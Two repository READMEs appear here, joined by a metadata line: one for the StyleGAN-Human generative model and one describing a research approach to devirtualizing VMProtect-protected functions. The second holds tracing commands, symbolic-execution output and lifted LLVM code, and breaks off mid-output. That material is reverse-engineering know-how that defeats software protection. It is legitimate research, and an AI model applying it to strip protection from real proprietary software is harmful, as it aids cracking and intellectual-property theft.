[07/04/2024] :star2::star2::star2: **Check out our new work in human foundation model -- [CosmicMan](https://github.com/cosmicman-cvpr2024/CosmicMan) at CVPR 2024!** - [13/02/2023] :star2::star2::star2: **Now the human parsing and keypoints for [SHHQ-1.0](./docs/Dataset.md) are available!** - [14/12/2022] :fire::fire::fire:**We have released [3DHumanGAN](https://3dhumangan.github.io/), which is towards photo-realistic 3D-aware human generation!**:fire::fire::fire: - [28/09/2022] :fire::fire::fire:**We have released a high-quality 3D human generative model [EVA3D](https://hongfz16.github.io/projects/EVA3D.html)!**:fire::fire::fire: - [20/07/2022] [SHHQ-1.0](./docs/Dataset.md) dataset with 40K images is released! :sparkles: - [15/06/2022] Data alignment and real-image inversion scripts are released. - [26/04/2022] Technical report released! - [22/04/2022] Technical report will be released before May. - [21/04/2022] The codebase and project page are created. ## Data Download The first version SHHQ-1.0, with 40K images is released. 
To download and use the dataset, please read the instructions in [Dataset.md](./docs/Dataset.md) (We are currently receiving a large number of applications and need to carefully verify each applicant; please be patient, and we will reply to you as soon as possible.) ## Model Zoo | Structure | 1024x512 | Metric | Scores | 512x256 | Metric | Scores | | --------- |:----------:| :----------:| :----------:| :-----: | :-----: | :-----: | | StyleGAN1 |[stylegan_human_v1_1024.pkl](https://drive.google.com/file/d/1h-R-IV-INGdPEzj4P9ml6JTEvihuNgLX/view?usp=sharing)| fid50k | 3.79 | to be released | - | - | | StyleGAN2 |[stylegan_human_v2_1024.pkl](https://drive.google.com/file/d/1FlAb1rYa0r_--Zj_ML8e6shmaF28hQb5/view?usp=sharing)| fid50k_full | 1.57 |[stylegan_human_v2_512.pkl](https://drive.google.com/file/d/1dlFEHbu-WzQWJl7nBBZYcTyo000H9hVm/view?usp=sharing) | fid50k_full | 1.97 | | StyleGAN3 |to be released | - | - | [stylegan_human_v3_512.pkl](https://drive.google.com/file/d/1_274jk_N6WSCkKWeu7hjHycqGvbuOFf5/view?usp=sharing) | fid50k_full | 2.54 | ## Web Demo Integrated into [Huggingface Spaces 🤗](https://huggingface.co/spaces) using [Gradio](https://github.com/gradio-app/gradio). Try out the Web Demo for generation: [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/hysts/StyleGAN-Human) and interpolation [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/hysts/StyleGAN-Human-Interpolation) <a href="https://colab.research.google.com/drive/1sgxoDM55iM07FS54vz9ALg1XckiYA2On"><img src="https://colab.research.google.com/assets/colab-badge.svg" height=22.5></a> We have prepared a Colab demo to allow you to synthesize images with the provided models, as well as visualize the performance of style-mixing, interpolation, and attribute editing. The notebook will guide you to install the necessary environment and download pretrained models. The output images can be found in `./StyleGAN-Human/outputs/`. Hope you enjoy! ## Usage ### System requirements * The original code bases are [stylegan (tensorflow)](https://github.com/NVlabs/stylegan), [stylegan2-ada (pytorch)](https://github.com/NVlabs/stylegan2-ada-pytorch), [stylegan3 (pytorch)](https://github.com/NVlabs/stylegan3), released by NVIDIA * We tested in Python 3.8.5 and PyTorch 1.9.1 with CUDA 11.1. (See https://pytorch.org for PyTorch install instructions.) ### Installation To work with this project on your own machine, you need to install the environment as follows: ``` conda env create -f environment.yml conda activate stylehuman # [Optional: tensorflow 1.x is required for StyleGAN1. ] pip install nvidia-pyindex pip install nvidia-tensorflow[horovod] pip install nvidia-tensorboard==1.15 ``` Extra notes: 1. If you hit conflicts related to the CUDA version, try emptying the LD_LIBRARY_PATH. For example: ``` LD_LIBRARY_PATH=; python generate.py --outdir=out/stylegan_human_v2_1024 --trunc=1 --seeds=1,3,5,7 --network=pretrained_models/stylegan_human_v2_1024.pkl --version 2 ``` 2.
We found the following troubleshooting links might be helpful: [1.](https://github.com/NVlabs/stylegan3), [2.](https://github.com/NVlabs/stylegan3/blob/main/docs/troubleshooting.md) ### Train The training scripts are based on the original [stylegan1](https://github.com/NVlabs/stylegan), [stylegan2-ada](https://github.com/NVlabs/stylegan2-ada-pytorch), and [stylegan3](https://github.com/NVlabs/stylegan3) with minor changes. Here we only provide the scripts with modifications for SG2 and SG3. You can replace the old files with the provided scripts to train. (assume SHHQ-1.0 is placed under data/) #### Train Stylegan2-ada-pytorch with SHHQ-1.0 ``` python train.py --outdir=training_results/sg2/ --data=data/SHHQ-1.0/ \ --gpus=8 --aug=noaug --mirror=1 --snap=250 --cfg=shhq --square=False ``` #### Train Stylegan3 with SHHQ-1.0 ``` python train.py --outdir=training_results/sg3/ --cfg=stylegan3-r --gpus=8 --batch=32 --gamma=12.4 \ --mirror=1 --aug=noaug --data=data/SHHQ-1.0/ --square=False --snap=250 ``` ### Pretrained models Please put the downloaded pretrained models [from above link](#Model-Zoo) under the folder 'pretrained_models'. ### Generate full-body human images using our pretrained model ``` # Generate human full-body images without truncation python generate.py --outdir=outputs/generate/stylegan_human_v2_1024 --trunc=1 --seeds=1,3,5,7 --network=pretrained_models/stylegan_human_v2_1024.pkl --version 2 # Generate human full-body images with truncation python generate.py --outdir=outputs/generate/stylegan_human_v2_1024 --trunc=0.8 --seeds=0-10 --network=pretrained_models/stylegan_human_v2_1024.pkl --version 2 # Generate human full-body images using stylegan V1 python generate.py --outdir=outputs/generate/stylegan_human_v1_1024 --network=pretrained_models/stylegan_human_v1_1024.pkl --version 1 --seeds=1,3,5 # Generate human full-body images using stylegan V3 python generate.py --outdir=outputs/generate/stylegan_human_v3_512 --network=pretrained_models/stylegan_human_v3_512.pkl --version 3 --seeds=1,3,5 ``` #### Note: The following demos are generated based on models related to StyleGAN V2 (stylegan_human_v2_512.pkl and stylegan_human_v2_1024.pkl). If you want to see results for V1 or V3, you need to change the loading method of the corresponding models. ### Interpolation ``` python interpolation.py --network=pretrained_models/stylegan_human_v2_1024.pkl --seeds=85,100 --outdir=outputs/inter_gifs ``` ### Style-mixing **image** using stylegan2 ``` python style_mixing.py --network=pretrained_models/stylegan_human_v2_1024.pkl --rows=85,100,75,458,1500 \\ --cols=55,821,1789,293 --styles=0-3 --outdir=outputs/stylemixing ``` ### Style-mixing **video** using stylegan2 ``` python stylemixing_video.py --network=pretrained_models/stylegan_human_v2_1024.pkl --row-seed=3859 \\ --col-seeds=3098,31759,3791 --col-styles=8-12 --trunc=0.8 --outdir=outputs/stylemixing_video ``` ### Aligned raw images For alignment, we use [openpose-pytorch](https://github.com/Hzzone/pytorch-openpose) for body-keypoints detection and [PaddlePaddle](https://github.com/PaddlePaddle/PaddleSeg/tree/release/2.5/contrib/PP-HumanSeg) for human segmentation. Before running the alignment script, few models need to be installed: 1. download [body_pose_model.pth](https://drive.google.com/drive/folders/1JsvI4M4ZTg98fmnCZLFM-3TeovnCRElG?usp=sharing) and place it into openpose/model/. 2. 
download and extract [deeplabv3p_resnet50_os8_humanseg_512x512_100k_with_softmax](https://paddleseg.bj.bcebos.com/dygraph/humanseg/export/deeplabv3p_resnet50_os8_humanseg_512x512_100k_with_softmax.zip) into PP_HumanSeg/export_model/deeplabv3p_resnet50_os8_humanseg_512x512_100k_with_softmax. 3. download and extract [deeplabv3p_resnet50_os8_humanseg_512x512_100k](https://paddleseg.bj.bcebos.com/dygraph/humanseg/train/deeplabv3p_resnet50_os8_humanseg_512x512_100k.zip) into PP_HumanSeg/pretrained_model/deeplabv3p_resnet50_os8_humanseg_512x512_100k. 4. install PaddleSeg: ``` pip install paddleseg ``` Then you can start alignment: ``` python alignment.py --image-folder img/test/ --output-folder aligned_image/ ``` ### Invert real image with [PTI](https://github.com/danielroich/PTI) Before inversion, please download our PTI weights: [e4e_w+.pt](https://drive.google.com/file/d/1NUfSJqLhsrU7c9PwAtlZ9xtrxhzS_6tu/view?usp=sharing) into /pti/. A few parameters you can change: - /pti/pti_configs/hyperparameters.py: - first_inv_type = 'w+' -> Use pretrained e4e encoder - first_inv_type = 'w' -> Use projection and optimization - /pti/pti_configs/paths_config.py: - input_data_path: path of real images - e4e: path of e4e_w+.pt - stylegan2_ada_shhq: pretrained stylegan2-ada model for SHHQ ``` python run_pti.py ``` Note: we used the test image under 'aligned_image/' (the output of alignment.py); the inverted latent code and fine-tuned generator will be saved in 'outputs/pti/'. ### Editing with InterfaceGAN, StyleSpace, and Sefa ``` python edit.py --network pretrained_models/stylegan_human_v2_1024.pkl --attr_name upper_length \\ --seeds 61531,61570,61571,61610 --outdir outputs/edit_results ``` ### Editing using inverted latent code ``` python edit.py --network outputs/pti/checkpoints/model_test.pkl --attr_name upper_length \\ --outdir outputs/edit_results --real True --real_w_path outputs/pti/embeddings/test/PTI/test/0.pt --real_img_path aligned_image/test.png ``` Note: 1. ''upper_length'' and ''bottom_length'' of ''attr_name'' are available for demo. 2. Layers to control and editing strength are set in edit/edit_config.py. ### Demo for [InsetGAN](https://arxiv.org/abs/2203.07293) We implement a quick demo using the key idea from InsetGAN: combining the face generated by FFHQ with the human body generated by our pretrained model, optimizing both face and body latent codes to get a coherent full-body image. Before running the script, you need to download the [FFHQ face model]( https://docs.google.com/uc?export=download&confirm=t&id=125OG7SMkXI-Kf2aqiwLLHyCvSW-gZk3M), or you can use your own face model, as well as [pretrained face landmark](https://docs.google.com/uc?export=download&confirm=&id=1A82DnJBJzt8wI2J8ZrCK5fgHcQ2-tcWM) and [pretrained CNN face detection model for dlib](https://docs.google.com/uc?export=download&confirm=&id=1MduBgju5KFNrQfDLoQXJ_1_h5MnctCIG) ``` python insetgan.py --body_network=pretrained_models/stylegan_human_v2_1024.pkl --face_network=pretrained_models/ffhq.pkl \\ --body_seed=82 --face_seed=43 --trunc=0.6 --outdir=outputs/insetgan/ --video 1 ``` ## Results ### Editing ![](./img/editing.gif) ### InsetGAN re-implementation ![](./img/insetgan.gif) ### Editing with inverted real image (from left to right: real image | inverted image | InterFaceGAN result | StyleSpace result | SeFa result) https://user-images.githubusercontent.com/98547009/173773800-bb7fe54a-84d3-4b30-9864-a6b7b311f8ff.mp4 ### For more demos, please visit our [**web page**](https://stylegan-human.github.io/).
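### Scripted generation (sketch)

If you prefer to call the generator from your own Python code instead of going through `generate.py`, the loading convention of the upstream stylegan2-ada-pytorch code base (which the V2 scripts here build on) can be used. The following is a minimal sketch under that assumption; it requires `dnnlib` and `legacy` from that code base to be importable, and the model path, seed and truncation value are illustrative only:

```python
# Minimal generation sketch following the stylegan2-ada-pytorch convention.
# Assumes dnnlib and legacy from NVlabs/stylegan2-ada-pytorch are on the
# Python path; the network path, seed and truncation value are illustrative.
import numpy as np
import torch
from PIL import Image

import dnnlib
import legacy

network_pkl = 'pretrained_models/stylegan_human_v2_1024.pkl'
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

# Load the generator with EMA weights, as the upstream scripts do.
with dnnlib.util.open_url(network_pkl) as f:
    G = legacy.load_network_pkl(f)['G_ema'].to(device)

# Sample one latent vector (seed 1) and synthesize a full-body image.
z = torch.from_numpy(np.random.RandomState(1).randn(1, G.z_dim)).to(device)
label = torch.zeros([1, G.c_dim], device=device)  # unconditional model
img = G(z, label, truncation_psi=0.8, noise_mode='const')

# Map the output from [-1, 1] to [0, 255] and save it as a PNG.
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
Image.fromarray(img[0].cpu().numpy(), 'RGB').save('seed0001.png')
```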
## TODO List - [ ] Release 1024x512 version of StyleGAN-Human based on StyleGAN3 - [ ] Release 512x256 version of StyleGAN-Human based on StyleGAN1 - [ ] Extension of downstream application (InsetGAN): Add face inversion interface to support fusing user face image and StyleGAN-Human body image - [x] Add Inversion Script into the provided editing pipeline - [ ] Release Dataset ## Related Works * (ICCV 2023) **UnitedHuman: Harnessing Multi-Source Data for High-Resolution Human Generation**, Jianglin Fu et al. [[Paper](https://arxiv.org/abs/2309.14335)], [[Code](https://github.com/UnitedHuman/UnitedHuman)], [[Project Page](https://unitedhuman.github.io/)] * (SIGGRAPH 2022) **Text2Human: Text-Driven Controllable Human Image Generation**, Yuming Jiang et al. [[Paper](https://arxiv.org/pdf/2205.15996.pdf)], [[Code](https://github.com/yumingj/Text2Human)], [[Project Page](https://yumingj.github.io/projects/Text2Human.html)], [[Dataset](https://github.com/yumingj/DeepFashion-MultiModal)] * (ICCV 2021) **Talk-to-Edit: Fine-Grained Facial Editing via Dialog**, Yuming Jiang et al. [[Paper](https://arxiv.org/abs/2109.04425)], [[Code](https://github.com/yumingj/Talk-to-Edit)], [[Project Page](https://www.mmlab-ntu.com/project/talkedit/)], [[Dataset](https://mmlab.ie.cuhk.edu.hk/projects/CelebA/CelebA_Dialog.html)] * (Technical Report 2022) **Generalizable Neural Performer: Learning Robust Radiance Fields for Human Novel View Synthesis**, Wei Cheng et al. [[Paper](https://arxiv.org/pdf/2204.11798.pdf)], [[Code](https://github.com/generalizable-neural-performer/gnr)], [[Project Page](https://generalizable-neural-performer.github.io/)], [[Dataset](https://generalizable-neural-performer.github.io/genebody.html)] ## Citation If you find this work useful for your research, please consider citing our paper: ```bibtex @article{fu2022styleganhuman, title={StyleGAN-Human: A Data-Centric Odyssey of Human Generation}, author={Fu, Jianglin and Li, Shikai and Jiang, Yuming and Lin, Kwan-Yee and Qian, Chen and Loy, Chen-Change and Wu, Wayne and Liu, Ziwei}, journal = {arXiv preprint}, volume = {arXiv:2204.11823}, year = {2022} } ``` ## Acknowledgement Part of the code is borrowed from [stylegan (tensorflow)](https://github.com/NVlabs/stylegan), [stylegan2-ada (pytorch)](https://github.com/NVlabs/stylegan2-ada-pytorch), [stylegan3 (pytorch)](https://github.com/NVlabs/stylegan3).
StyleGAN-Human: A Data-Centric Odyssey of Human Generation
null
0
10
5
41
24
1
0
JonathanSalwan/VMProtect-devirtualization
<h1 align="center">VMProtect Devirtualization</h1> <p align="center"> An <b>experimental</b> dynamic approach to devirtualize pure functions protected by <b>VMProtect 3.x</b> </p> <p>&nbsp;</p> <p>&nbsp;</p> * [TL;DR](#tldr) * [Introduction](#introduction) * [The approach](#the-approach) * [Example 1: A simple bitwise operation protected](#example-1-a-simple-bitwise-operation-protected) * [Example 2: A MBA operation protected](#example-2-a-mba-operation-protected) * [Example 3: More than one basic block](#example-3-more-than-one-basic-block) * [Conclusion and limitations](#conclusion-and-limitations) * [References](#references) <p>&nbsp;</p> <p>&nbsp;</p> # TL;DR I am sharing some notes about a dynamic approach to devirtualize pure functions protected by VMProtect. This approach has shown very good results if the virtualized function only contains one basic block (regardless of its size). This is a common scenario when binaries protect arithmetic operations. However, this approach is a bit more experimental when the target function contains more than one basic block. Nevertheless, we managed to devirtualize and reconstruct the binary code from samples that contain 2 basic blocks which suggests that it is possible to fully devirtualize small functions dynamically. # Introduction [VMProtect](https://vmpsoft.com) is a software protection that protects code by running it through a virtual machine with non-standard architecture. This protection is a great playground for asm lovers [0, 1, 2, 3, 4, 5, 6, 11]. Also, there are already numerous tools that attack this protection [7, 8, 9, 12, 13]. In 2016 we took a look at the [Tigress](https://github.com/JonathanSalwan/Tigress_protection/) software protection solution and managed to defeat its virtualization using symbolic execution and LLVM. This approach has been presented at DIMVA 2018 [10] and I wanted to test it on VMProtect. Note that there is no magic solution that works on every binaries, there are always tradeoffs depending on the target and your goals. This modest contribution aims to provide an example of a dynamic attack against *pure functions* that are virtualized by VMProtect. The main advantage of a dynamic attack is that it defeats by design some VMProtect's static protections like self modifying code, key and operands encryption etc. We consider a pure function a function with a finite number of paths and that does not have side effects. There can be several inputs but only one output. Below is an example of a pure function: ```cpp int secret(int x, int y) { int r = x ^ y; return r; } ``` # The approach We rely on the key intuition that an obfuscated trace T' (from the obfuscated code P') combines original instructions from the original code P (the trace T corresponding to T' in the original code) and instructions of the virtual machine VM such that T' = T + VM(T). If we are able to distinguish between these two subsequences of instructions T and VM(T), we then are able to reconstruct one path of the original program P from a trace T'. By repeating this operation to cover all paths of the virtualized program, we will be able to reconstruct the original program P. In our practical example, the original code has a finite number of executable paths, which is the case in many situations involving intellectual property protection. To do so, we proceed with the following steps: 1. Identify the virtualized function and its arguments 2. Generate a VMProtect trace of the target 3. 
Replay the VMP trace and construct symbolic expressions to obtain the relation between inputs and output 4. Apply optimizations on symbolic expressions to avoid as much as possible instructions from the VM 5. Lift our symbolic representation to the LLVM-IR to build a new unprotected version of the target ## Example 1: A simple bitwise operation protected Let's take as a first example the following function: it takes two inputs and returns `x ^ y`, and it is protected by VMProtect. ```cpp int secret(int x, int y) { VMProtectBegin("secret"); int r = x ^ y; VMProtectEnd(); return r; } ``` We start by identifying where functions are using VMProtect and how many arguments they have. For our example we may have something like below: <p align="center"> <img src="assets/screen1.png"> </p> Just by reading the code we know that the function starts at the address `0x4011c0`, has two 32-bit arguments (`edi` and `esi`) and returns at `0x4011ef`. That's all the reverse-engineering we need. The next parts will be automatic. Now we have to generate an execution trace of this virtualized function. To do so we use a [Pintool](pin/source/tools/VMP_Trace/VMP_Trace.cpp). It only needs a `start` and an `end` address (for our example, `0x4011c0` and `0x4011ef`) which represent the instrumentation range. Note that any kind of DBI or emulator could do this job. ``` $ ./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198848 -end 4198895 -- ./vmp_binaries/binaries/sample2.vmp.bin 1 2 &> ./vmp_traces/sample2.vmp.trace ``` You can see the result [here](vmp_traces/sample2.vmp.trace). The trace format uses three kinds of operations: `mr`, `r` and `i`. `mr` is a memory read access done by the instruction `i`, and `r` holds the CPU registers. For example: ``` mr:0x7ffda459d718:8:0x227db4f8 r:0x40200a:0x0:0x7ffda459f571:0x2:0x40200a:0x0:0x0:0x7ffda459d688:0x0:0x0:0x7feee9b80ac0:0x7feee9b8000f:0xad1c3e:0x0:0x0:0x0 i:0x89173e:8:488BB42490000000 ``` We have a memory read that loads an `8`-byte constant `0x227db4f8` from the address `0x7ffda459d718`. The instruction is executed at the address `0x89173e` and its 8-byte opcode `488BB42490000000` is a [`mov rsi, qword ptr [rsp + 0x90]`](http://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=488BB42490000000&arch=x86-64&endianness=little&dis_with_addr=True&dis_with_raw=True&dis_with_ins=True#disassembly). The register state before the execution is the following: ```python (1) RAX = 0x40200a (9) R8 = 0 (2) RBX = 0 (10) R9 = 0 (3) RCX = 0x7ffda459f571 (11) R10 = 0x7feee9b80ac0 (4) RDX = 0x2 (12) R11 = 0x7feee9b8000f (5) RDI = 0x40200a (13) R12 = 0xad1c3e (6) RSI = 0 (14) R13 = 0 (7) RBP = 0 (15) R14 = 0 (8) RSP = 0x7ffda459d688 (16) R15 = 0 ``` Once the VMP trace has been generated, we replay it using the [attack_vmp.py](attack_vmp.py) script. This script uses [Triton](https://github.com/jonathansalwan/Triton) to build the path predicate of the trace. Note that all expressions which involve symbolic variables (inputs of the function) are kept symbolic while all expressions unrelated to the inputs are concretized. In other words, our symbolic expressions do not contain any operation related to the virtual machine (the machinery itself does not depend on the user) but only operations related to the original program. Below is an example of concretization. On the left we have an AST that contains subexpressions which do not involve a symbolic variable (`1 + 2` and `6 ^ 3`); a minimal sketch of this folding step follows.
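To make the folding step concrete, below is a minimal, self-contained sketch (toy tuples standing in for the real AST, and deliberately not Triton's actual API) in which any subtree that references no symbolic variable collapses to a constant:

```python
# Toy model of devirtualization by concretization: subtrees that do not
# depend on a symbolic variable ('x' or 'y') are folded into constants,
# so only the operations of the original program survive.
import operator

OPS = {'+': operator.add, '^': operator.xor}

def fold(node):
    """Return an int for fully concrete subtrees, a reduced tuple otherwise."""
    if isinstance(node, (int, str)):      # int: concrete leaf, str: symbolic leaf
        return node
    op, lhs, rhs = node
    lhs, rhs = fold(lhs), fold(rhs)
    if isinstance(lhs, int) and isinstance(rhs, int):
        return OPS[op](lhs, rhs)          # no symbolic input -> concretize
    return (op, lhs, rhs)

# (1 + 2) and (6 ^ 3) involve no input, so they fold to 3 and 5:
ast = ('+', ('+', 1, 2), ('^', ('^', 6, 3), ('^', 'x', 'y')))
print(fold(ast))  # ('+', 3, ('^', 5, ('^', 'x', 'y')))
```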
So these branches are concretized and replaced by constants `3` and `5` which leads to the AST on the right. **This is how we devirtualize code.** <p align="center"> <img src="assets/screen2.png"> </p> **A note on formula-level backward slicing**: As it is common in symbolic execution, the symbolic representation is first computed in a forward manner along the path, then all logical operations and definitions affecting neither the final result nor the followed path are removed from the symbolic expression (formula slicing, a.k.a. formula pruning). This turns out to perform on the formula the equivalent of a backward slicing code analysis from the program output. Thus, at the return of the `secret` function, we have an expression of the relation between the inputs and the output without the instructions of VMProtect. The `./attack_vmp.py` script takes as parameters the trace file and the size of symbolic variables. Remember, it was `edi` and `esi`, so they are 4 bytes long. The result of the script is the following: ``` $ ./attack_vmp.py --trace1 ./vmp_traces/sample2.vmp.trace --symsize 4 [+] Replaying the VMP trace [+] Symbolize inputs [+] Instruction executed: 12462 [+] Emulation done [+] Return value: 0x3 [+] Devirt expr: (bvor (bvnot (bvor (bvnot (bvnot x)) (bvnot y))) (bvnot (bvor (bvnot x) (bvnot (bvand (bvnot y) (bvnot y)))))) [+] Synth expr: (bvxor x y) [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i32 %SymVar_0, i32 %SymVar_1) { entry: %0 = xor i32 %SymVar_0, %SymVar_1 ret i32 %0 } [+] EOF LLVM IR ============================== ``` As we can see, the devirtualized expression returned by the `secret` function is pretty concise and does not contain instructions from the virtual machine. ```smt (bvor (bvnot (bvor (bvnot (bvnot x)) (bvnot y) ) ) (bvnot (bvor (bvnot x) (bvnot (bvand (bvnot y) (bvnot y) ) ) ) ) ) ``` However, we did not manage to recover the original expression which was a simple `XOR` operation. It looks like the `XOR` has been translated to bitwise operations. Luckily, we recently released new features in the Triton project which are a [synthesizer](https://github.com/JonathanSalwan/Triton/issues/1074) and a lifter to [LLVM-IR](https://github.com/JonathanSalwan/Triton/issues/1078). Thus, we can synthesize the expression which gives us the expression `(bvxor x y)`. It's a good win and now we can go further by lifting this expression to LLVM-IR and then compile a new devirtualized binary code. ## Example 2: A MBA operation protected Ok, now let's take a look at another example which tries to hide an MBA operation. The original source code is the following: ```cpp // This function is an MBA that computes: (x ^ 92) + y // We will protect this MBA with VMProtect and see if we can recover "(x ^ 92) + y" char secret(char x, char y) { VMProtectBegin("secret"); int a = 229 * x + 247; int b = 237 * a + 214 + ((38 * a + 85) & 254); int c = (b + ((-(2 * b) + 255) & 254)) * 3 + 77; int d = ((86 * c + 36) & 70) * 75 + 231 * c + 118; int e = ((58 * d + 175) & 244) + 99 * d + 46; int f = (e & 148); int g = (f - (e & 255) + f) * 103 + 13; int r = (237 * (45 * g + (174 * g | 34) * 229 + 194 - 247) & 255) + y; VMProtectEnd(); return r; } ``` Like with the first example, we have to identify where this function starts and ends and generate a VMP trace. 
``` $ ./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198857 -end 4199140 -- ./vmp_binaries/binaries/sample3.vmp.bin 1 2 &> ./vmp_traces/sample3.vmp.trace ``` Once the [VMP trace](vmp_traces/sample3.vmp.trace) is generated, let's run the `./attack_vmp.py` script. ``` $ ./attack_vmp.py --trace1 ./vmp_traces/sample3.vmp.trace --symsize 1 [+] Replaying the VMP trace [+] Symbolize inputs [+] A potential symbolic jump found on CF flag: 0x821dac: popfq - Model: {0: x:32 = 0xa3, 1: y:32 = 0xff} [+] A potential symbolic jump found on CF flag: 0x87f437: popfq - Model: {0: x:32 = 0xa3, 1: y:32 = 0xff} [+] Instruction executed: 25085 [+] Emulation done [+] Return value: 0x5f [+] Devirt expr: In: (bvadd (bvadd (bvshl (bvadd (_ bv1 32) (bvnot (bvlshr (concat (_ bv0 8) (_ bv0 8) ((_ extract 15 8) ... [+] Synth expr: In: (bvadd (bvadd (bvshl (bvadd (_ bv1 32) (bvnot (bvlshr (concat (_ bv0 8) (_ bv0 8) ((_ extract 15 8) ... [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i8 %SymVar_0, i8 %SymVar_1) { entry: %0 = xor i8 %SymVar_0, 92 %1 = and i8 %SymVar_0, 0 %2 = zext i8 %1 to i32 %3 = or i32 0, %2 %4 = shl i32 %3, 8 %5 = zext i8 %0 to i32 %6 = or i32 %4, %5 %7 = and i8 %SymVar_1, 0 %8 = zext i8 %7 to i32 %9 = or i32 0, %8 %10 = shl i32 %9, 8 %11 = zext i8 %SymVar_1 to i32 %12 = or i32 %10, %11 %13 = zext i8 %7 to i32 %14 = or i32 0, %13 %15 = shl i32 %14, 8 %16 = zext i8 %SymVar_1 to i32 %17 = or i32 %15, %16 %18 = lshr i32 %17, 7 %19 = xor i32 %18, -1 %20 = add i32 1, %19 %21 = shl i32 %20, 8 %22 = add i32 %21, %12 %23 = add i32 %22, %6 ret i32 %23 } [+] EOF LLVM IR ============================== ``` The result is pretty interesting for several reasons. First, we successfully managed to avoid as much as possible instructions from the virtual machine as we went from 25085 instructions executed to 25 LLVM instructions. However, we did not manage to get a good synthesized version of the output (yes, I know, we are going further than just doing devirtualization). The advantage of lifting our symbolic expressions to LLVM-IR is that we can fully benefit from LLVM's optimization pipeline. Let's do this: ```llvm $ opt -S -O3 ./devirt/sample3.ll ; ModuleID = 'devirt/sample3.ll' source_filename = "tritonModule" ; Function Attrs: mustprogress nofree norecurse nosync nounwind readnone willreturn define i32 @__triton(i8 %SymVar_0, i8 %SymVar_1) local_unnamed_addr #0 { entry: %0 = xor i8 %SymVar_0, 92 %1 = zext i8 %0 to i32 %2 = zext i8 %SymVar_1 to i32 %3 = shl nuw nsw i32 %2, 1 %4 = and i32 %3, 256 %5 = add nuw nsw i32 %1, %2 %6 = sub nsw i32 %5, %4 ret i32 %6 } ``` Using LLVM optimizations we managed to remove noise from our devirtualized output and thus break the MBA. We can see the `XOR` operation with its constant (`%0 = xor i8 %SymVar_0, 92`) and the `+ y` (`%6 = add nsw i32 %5, %1`). Instructions between are just dealing with the sign. To summarize this example, we fully devirtualized the `secret` function using the `attack_vmp.py` script and then we fully broke the MBA using LLVM optimizations. ## Example 3: More than one basic block We got very good results if the `secret` function only contains one basic block regardless of its size. So at this point we are able to devirtualize one path. To reconstruct the whole function behavior, we have to successively devirtualize reachable paths. To do so, we have to perform a path coverage on user-dependent branches. 
At the end, we get a path tree which represents the different paths of the original function. The path tree is obtained by introducing an if-then-else construction from two traces T1 and T2 with the same prefix, followed by a condition C in T1 and not(C) in T2. Once a path tree is built, we can let LLVM generate a CFG. <p align="center"> <img src="assets/screen3.png"> </p> With the Tigress software protection, virtual jumps were implemented with real `jcc` instructions which allowed us to quickly identify the jump condition. However, things get more complex with VMProtect as it does not use `jcc` instructions to jump to another virtual block. We had to define markers on a dynamic trace to spot the condition involved in a user-dependent branch. This is the experimental part of this attack, as the markers are not fully accurate but worked for our samples. Ok, let's consider the following sample: ```cpp int secret(int x, int y) { VMProtectBegin("secret"); int r = 0; if (x + y == 1001) r = x + 1; else r = y - 1; VMProtectEnd(); return r; } ``` As with the first examples, we have to generate and analyze the trace. ``` $./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198848 -end 4198928 -- ./vmp_binaries/binaries/sample5.vmp.bin 1 2 &> ./vmp_traces/sample5.vmp.trace.1 $ ./attack_vmp.py --trace1 ./vmp_traces/sample5.vmp.trace.1 --symsize 4 [+] Replaying the VMP trace [+] Symbolize inputs [+] A potential symbolic jump found of AF flag: 0x80d905: cmp r11b, dl - Model: {0: x:32 = 0x0, 1: y:32 = 0x3e9} [+] Instruction executed: 16164 [+] Emulation done [+] Return value: 0x4 [+] Devirt expr: (bvnot (bvadd (bvand (bvnot y) (bvnot y)) (_ bv1 32))) [+] Synth expr: (bvadd y (_ bv4294967295 32)) [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i32 %SymVar_1) { entry: %0 = add i32 %SymVar_1, -1 ret i32 %0 } [+] EOF LLVM IR ============================== ``` The script tells us that there may be a potential symbolic jump found on the `AF` flag at address `0x80d905`. It also provides a new model (using symbolic execution) which should take the other path. So let's generate a second trace using this model (if you take a look at the model, it is consistent with our source code). ``` $ ./pin/pin -t ./pin/source/tools/VMP_Trace/obj-intel64/VMP_Trace.so -start 4198848 -end 4198928 -- ./vmp_binaries/binaries/sample5.vmp.bin 0 1001 &> ./vmp_traces/sample5.vmp.trace.2 ``` Once the second trace is generated, we have to provide those two traces to the `attack_vmp.py` script so that it can merge them and create a path tree. We have extra options to define where the condition is located and on what flag (AF flag at `0x80d905`). ``` $ ./attack_vmp.py --trace1 ./vmp_traces/sample5.vmp.trace.1 --symsize 4 --trace2 ././vmp_traces/sample5.vmp.trace.2 --vbraddr 0x80d905 --vbrflag af [+] Replaying the VMP trace [+] Symbolize inputs [+] A potential symbolic jump found of AF flag: 0x80d905: cmp r11b, dl - Model: {0: x:32 = 0x0, 1: y:32 = 0x3e9} [+] Instruction executed: 16164 [+] Emulation done [+] A second trace has been provided [+] Replaying the VMP trace [+] Symbolize inputs [+] Instruction executed: 15758 [+] Emulation done [+] Merging expressions from trace1 and trace2 [+] Return value: 0x3e9 [+] Devirt expr: In: (ite (= (ite (= (_ bv16 8) (bvand (_ bv16 8) (bvxor (bvsub (_ bv80 8) ((_ extract 7 0) (bvadd (bvlsh ...
